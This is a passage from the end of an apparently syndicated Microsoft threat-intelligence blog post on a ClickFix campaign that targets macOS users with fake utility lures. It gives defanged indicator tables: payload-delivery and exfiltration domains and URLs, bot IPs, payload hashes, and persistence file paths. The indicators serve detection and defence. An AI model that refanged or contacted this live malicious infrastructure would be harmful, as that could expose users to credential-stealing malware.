\\nhxxps:\/\/kvrnjr30[.]apexharvestor[.]digital \\n \\n| URL| Payload delivery \\nhxxps:\/\/yygp4pdh[.]apexharvestor[.]digital | URL| Payload delivery \\nhxxps:\/\/t[.]me\/ax03bot| URL| Payload delivery \\n0x666[.]info| Domain| Payload delivery, C2, and exfiltration \\nhonestly[.]ink \\n \\n| Domain | Payload delivery, C2, and exfiltration \\n95.85.251[.]177 \\n \\n | IP address| Payload delivery, C2, and exfiltration \\npla7ina[.]cfd| Domain| Payload delivery, C2, and exfiltration \\nplay67[.]cc| Domain| Payload delivery, C2, and exfiltration \\n \\n### Helper campaign\\n\\n**Indicator **| **Type **| **Description ** \\n—|—|— \\nrvdownloads[.]com | Domain | Payload delivery \\nfamiode[.]com | Domain | Payload delivery \\ncontatoplus[.]com | Domain | Payload delivery \\nwoupp[.]com | Domain | Payload delivery \\nsaramoftah[.]com | Domain | Payload delivery \\nptrei[.]com | Domain | Payload delivery \\nwriconsult[.]com | Domain | Payload delivery \\nkayeart[.]com | Domain | Payload delivery \\nejecen[.]com | Domain | Payload delivery \\nstinarosen[.]com | Domain | Payload delivery \\nbiopranica[.]com | Domain | Payload delivery \\nraxelpak[.]com | Domain | Payload delivery \\noctopox[.]com | Domain | Payload delivery \\nboosterjuices[.]com | Domain | Payload delivery \\nftduk[.]com| Domain| Payload delivery \\ndryvecar[.]com| Domain| Payload delivery \\nvcopp[.]com| Domain| Payload delivery \\nkcbps[.]com| Domain| Payload delivery \\njpbassin[.]com| Domain| Payload delivery \\nisgilan[.]com| Domain | Payload delivery \\narkypc[.]com| Domain | Payload delivery \\nhacelu[.]com| Domain| Payload delivery \\nstclegion[.]com \\n \\n| Domain| Payload delivery \\nxeebii[.]com | Domain| Payload delivery \\nhxxp:\/\/138.124.93[.]32\/contact | URL | Exfiltration endpoint \\nhxxp:\/\/168.100.9[.]122\/contact | URL | Exfiltration endpoint \\nhxxp:\/\/199.217.98[.]33\/contact | URL | Exfiltration endpoint \\nhxxp:\/\/38.244.158[.]103\/contact | URL | Exfiltration endpoint \\nhxxp:\/\/38.244.158[.]56\/contact | URL | Exfiltration endpoint \\nhxxp:\/\/92.246.136[.]14\/contact | URL | Exfiltration endpoint \\nhxxps:\/\/avipstudios[.]com\/contact | URL | Exfiltration endpoint \\nhxxps:\/\/joytion[.]com\/contact | URL | Exfiltration endpoint \\nhxxps:\/\/laislivon[.]com\/contact | URL | Exfiltration endpoint \\nhxxps:\/\/mpasvw[.]com\/contact| URL| Exfiltration endpoint \\nhxxps[:\/\/]lakhov[.]com\/contact| URL| Exfiltration endpoint \\n \\n### Update campaign infrastructure\\n\\n**Indicator**| **Type**| **Description** \\n—|—|— \\nreachnv[.]com| Domain| Delivery of the update install variant of the helper campaign \\nvagturk[.]com| Domain | Delivery of the update install variant of the helper campaign \\nfutampako[.]com| Domain | Delivery of the update install variant of the helper campaign \\noctopox[.]com| Domain | Delivery of the update install variant of the helper campaign \\nlbarticle[.]com| Domain | Delivery of the update install variant of the helper campaign \\nraytherrien[.]com| Domain | Delivery of the update install variant of the helper campaign \\njoeyapple[.]com| Domain | Delivery of the update install variant of the helper campaign \\n \\n### Persistence and bot execution\\n\\n**Indicator**| **Type**| **Description** \\n—|—|— \\n45.94.47[.]204| IP address| Bot communication IP address \\nwusetail[.]com| Domain| Hosting bot payload \\naforvm[.]com| Domain | Hosting bot payload \\nouilov[.]com| Domain| Hosting bot payload \\nmalext[.]com \\n \\n| Domain| Hosting bot payload \\nrebidy[.]com \\n \\n| Domain| Hosting bot payload \\n \\n### Payloads\\n\\n**Indicator**| **Type**| **Description** \\n—|—|— \\n 9d2da07aa6e7db3fbc36b36f0cfd74f78d5815f5ba55d0f0405cdd668bd13767 | SHA-256| Payload \\n 7ca42f1f23dbdc9427c9f135815bb74708a7494ea78df1fbc0fc348ba2a161ae| SHA-256| Payload \\n241a50befcf5c1aa6dab79664e2ba9cb373cc351cb9de9c3699fd2ecb2afab05 | SHA-256| Payload \\n522fdfaff44797b9180f36c654f77baf5cdeaab861bbf372ccfc1a5bd920d62e| SHA-256| Payload \\n \\n### File indicators of attack\\n\\n**Indicator******| **Type******| **Description****** \\n—|—|— \\n\/tmp\/helper| Folder path| Malware staging \\n\/tmp\/starter| Folder path| Malware plist staging \\n~\/Library\/Application Support\/Google\/GoogleUpdate.app\/Contents\/MacOS\/GoogleUpdate| Folder path| Malicious file masquerading as Google Update component \\n~\/LaunchAgents\/com.google.keystone.agent.plist| Plist name | Staged plist running malicious executable \\n~\/Library\/LaunchAgents\/com.\\u003crandom value\\u003e.plist| Plist name| Staged plist running malicious executable \\n \\n# References\\n\\n * Fake CleanMyMac site installs SHub Stealer and backdoors crypto wallets. Malwarebytes labs (published 2026-03-06)\\n * Malvertising Campaign Spreads AMOS \u2018malext\u2019 macOS Infostealer via Fake Text-Sharing Ads. gbhackers (published 2026-03-03)\\n * ClickFix Is Targeting Mac Users Through Google Ads and Fake AI Guides. IzooLogic(published 2026-02-18)\\n * Phantom in the vault: Obsidian abused to deliver PhantomPulse RAT. elastic security (published 2026-04-13)\\n * https:\/\/www.iru.com\/blog\/atomic-stealer-amos-returns (published 2026-03-31)\\n\\n\\n\\n_This research is provided by Microsoft Defender Security Research with contributions from Arlette Umuhire Sangwa, Kajhon Soyini, Srinivasan Govindarajan, Michael Melone, and members of Microsoft Threat Intelligence._\\n\\n# Learn more\\n\\n * For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.\\n * To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.\\n * To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.\\n\\n\\n\\nThe post ClickFix campaign uses fake macOS utilities lures to deliver infostealers appeared first on Microsoft Security Blog.”,”published”:”2026-05-06T15:20:32″,”modified”:”2026-05-06T15:20:32″,”type”:”mssecure”,”title”:”ClickFix campaign uses fake macOS utilities lures to deliver infostealers”,”source”:””,”references”:””,”id”:”MSSECURE:B9774A5238ABF9F8F6DE190012C0F965″,”bulletinFamily”:”blog”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/05\/06\/clickfix-campaign-uses-fake-macos-utilities-lures-deliver-infostealers\/”,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-06T16:58:39″,”description”:”Microsoft researchers continue to observe the evolution of an infostealer campaign distributing ClickFix\u2011style instructions and targeting macOS users. In this recent iteration, threat actors attempt…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,110,13,33,7,11,5],"class_list":["post-51748","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-mssecure","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n